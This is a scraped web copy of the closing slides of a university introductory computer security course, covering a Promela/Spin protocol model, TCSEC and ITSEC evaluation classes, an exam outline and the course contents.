![Page 535: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/535.jpg)
Promela example
init
chan AtoB = [1] of mtype,byte ;chan BtoA = [1] of mtype,byte ;chan Ain = [2] of mtype,byte ;chan Bin = [2] of mtype,byte ;chan Aout = [2] of mtype,byte ;chan Bout = [2] of mtype,byte ;atomic
run application( Ain,Aout );run transfer( Aout,Ain,BtoA,AtoB );run transfer( Bout,Bin,AtoB,BtoA );run application( Bin,Bout )
;AtoB!err(0)
CS3235 - Hugh Anderson’s notes. Page number: 534
![Page 536: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/536.jpg)
Promela example
#define MAX 10mtype = ack, nak, err, next, accept proctype transfer( chan in, out, chin, chout )
byte o,i;in?next(o);do
:: chin?nak(i) -> out!accept(i); chout!ack(o):: chin?ack(i) -> out!accept(i); in?next(o); chout!ack(o):: chin?err(i) -> chout!nak(o)
od
CS3235 - Hugh Anderson’s notes. Page number: 535
![Page 537: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/537.jpg)
Promela example
proctype application( chan in, out )
int i=0, j=0, last i=0;do
:: in?accept(i) ->assert( i==last i );if
:: (last i!=MAX) -> last i = last i+1:: (last i==MAX)
fi:: out!next(j) ->
if:: (j!=MAX) -> j=j+1:: (j==MAX)
fiod
CS3235 - Hugh Anderson’s notes. Page number: 536
![Page 538: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/538.jpg)
Spin simulation
CS3235 - Hugh Anderson’s notes. Page number: 537
![Page 539: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/539.jpg)
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 538
![Page 540: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/540.jpg)
Formal evaluation - TCSEC
TCSEC (The Orange book) was the first rating system forthe security of products. It defined six different evaluationclasses. The classes are:
• C1 - For same-level security access. Not currently used.
• C2 - Controlled access protection - users are individ-ually accountable for their actions. Most OS manufactur-ers have C2 versions of the OS.
• B1 - Mandatory BLP policies - for more secure systemshandling classified data.
CS3235 - Hugh Anderson’s notes. Page number: 539
![Page 541: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/541.jpg)
Formal evaluation - TCSEC
• B2 - structured protection - mandatory access controlfor all objects in the system. Formal models.
• B3 - security domains - more controls, minimal com-plexity, provable consistency of model.
• A1 - Verified design - consistency proofs betweenmodel and specification.
CS3235 - Hugh Anderson’s notes. Page number: 540
![Page 542: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/542.jpg)
Formal evaluation - ITSEC
From Dutch, English, French and German national se-curity evaluation criteria .
Adaptable .
Sponsor determines operational requirements, threatsand security objectives.
ITSEC specifies the interactions and documents be-tween the sponsor and the evaluator.
CS3235 - Hugh Anderson’s notes. Page number: 541
![Page 543: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/543.jpg)
ITSEC
Again there are various levels of evaluation: E0..E6, withE6 giving the highest level of assurance - it requires twoindependant formal verifications.
First certification of a smart-card system under E6.
The smart-cards are electronic purses - that is theycarry value,
Forgery must be impossible. The certification encompassed the communication
with the card, as well as the software within the card,and at the bank.
CS3235 - Hugh Anderson’s notes. Page number: 542
![Page 544: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/544.jpg)
Data Diode E6, BLP
Data Diode
High Security
Low security
CS3235 - Hugh Anderson’s notes. Page number: 543
![Page 545: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/545.jpg)
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 544
![Page 546: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/546.jpg)
Exam
You can expect 12 pages - write on paper. Marks/50.
10 short answer questions worth 1 mark each
Longer questions on...
Encryption Information Models Key systems
CS3235 - Hugh Anderson’s notes. Page number: 545
![Page 547: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/547.jpg)
Exam
Modulo, primes, Fermat, Euler: general & specific
Symmetric cryptosystems: IC, DES, general & specific
Physical limits: general
Information theory: general & security-specific
Models: BLP, Biba - general & specific
Key systems: RSA, Kerberos, specific
CS3235 - Hugh Anderson’s notes. Page number: 546
![Page 548: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/548.jpg)
Dr Robert Deng
Real World Applications of Network/Computer Security
Abstract: The lecture is on practical applications of net-work and computer security technology. Examples in-clude virtual private networks, security solutions for e-banking, fair exchange of digital valuables over the Inter-net (e.g., electronic contract signing over a network andcertified e-mail delivery) and techniques for user privacyprotection in cyberspace.
CS3235 - Hugh Anderson’s notes. Page number: 547
![Page 549: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/549.jpg)
Finally
This is my last lecture, so...
Good luck with the exam, and
Thanks for your attention
Good luck!
CS3235 - Hugh Anderson’s notes. Page number: 548
![Page 550: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/550.jpg)
Contents
1 Lecture 1 - Introduction
2 Lecture 2 - Preliminaries
3 Lecture 3 - Preliminaries
4 Lecture 4 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 549
![Page 551: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/551.jpg)
5 Lecture 5 - Preliminaries
6 Lecture 6 - Errors
7 Lecture 7 - Encryption
8 Lecture 8 - Protocols
9 Lecture 9 - System (in)security
10 Lecture 10 - More (in)security
CS3235 - Hugh Anderson’s notes. Page number: 550
![Page 552: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/552.jpg)
11 Lecture 11 - Security
CS3235 - Hugh Anderson’s notes. Page number: 551
![Page 553: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/553.jpg)
CS3235 - Hugh Anderson’s notes. Page number: 552